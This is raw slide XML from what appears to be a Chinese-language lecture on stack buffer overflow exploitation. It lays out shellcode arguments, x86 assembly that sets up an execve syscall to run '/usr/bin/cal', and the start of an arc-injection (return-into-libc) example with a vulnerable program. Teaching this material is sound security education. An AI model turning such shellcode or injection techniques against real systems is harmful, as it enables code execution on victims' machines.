                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 2 array pointer array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char * []={0xbffff9ff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>           “1111”}; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>\0”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>参数数据也包含在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="4343400"/>
            <a:ext cx="3581400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -78102"/>
              <a:gd name="adj2" fmla="val 34722"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>指向一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>NULL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53253" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="5486400"/>
            <a:ext cx="3733800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74148"/>
              <a:gd name="adj2" fmla="val -64287"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>变为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>来终止指针数组，并用用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>arg3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53254" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="2362200"/>
            <a:ext cx="2133600" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65255"/>
              <a:gd name="adj2" fmla="val 13282"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>设置三个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>execve()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>调用参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5756615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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="8153400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xb,%al #set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> for execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffffa03,%ebx #ptr to arg 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffff9fb,%ecx #ptr to arg 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov 0xbffff9ff,%edx  #ptr to arg 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int $80 # make system call to execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="4648200"/>
            <a:ext cx="4876800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -57912"/>
              <a:gd name="adj2" fmla="val -120454"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>execve()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>系统调用导致了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>日历程序的执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27776939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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>弧注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> (return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>弧注入将控制转移到已经存在于程序内存空间中的代码中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>弧注入的利用方式是在程序的控制流中插入一段新的“弧”（表示控制流转移），而不是进行代码注入；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>可以安装一个已有函数的地址（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>），用于执行已存在于本地系统上的程序；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>更复杂的攻击可能会使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>这种技术。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4013234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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>弧注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>漏洞程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1905000"/>
            <a:ext cx="8001000" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 1. #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
